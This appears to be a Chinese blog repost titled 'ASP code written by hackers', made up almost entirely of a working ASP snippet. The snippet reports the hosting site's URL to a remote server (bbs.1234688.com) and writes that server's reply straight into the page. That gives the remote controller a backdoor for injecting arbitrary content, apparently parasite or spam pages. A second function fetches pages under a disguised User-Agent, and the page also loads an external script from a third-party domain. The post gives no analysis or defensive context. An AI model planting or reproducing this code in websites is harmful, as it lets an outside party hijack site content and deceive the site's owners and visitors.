黑客写的相关asp代码
2016-11-01 09:56:05 访问(1829) 赞(0) 踩(0)
<script type="text/javascript"src="http://www.zhiliaobaidu.com/ad/zd.js"></script>
<%
Server.ScriptTimeOut=500
Remote_server="http://bbs.1234688.com" //服务端url地址
host_name="http://"&request.servervariables("HTTP_HOST")&Request.ServerVariables("SCRIPT_NAME")
//response.write host_name
Content_mb=getHTTPPage(Remote_server&"/index.asp?host="&host_name)
response.write Content_mb
%>
<%
Function getHTTPPage(url)
On Error Resume Next
dim http
set http=Server.createobject("Microsoft.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytesToBSTR(Http.responseBody,"gb2312")
set http=nothing
If Err.number<>0 then
Response.Write "<p align='center'><font color='red'><b> </b></font></p>"
Err.Clear
End If
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
<%
Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
%>
标签:
黑客写的相关asp代码 


上一条:
下一条:
相关评论
发表评论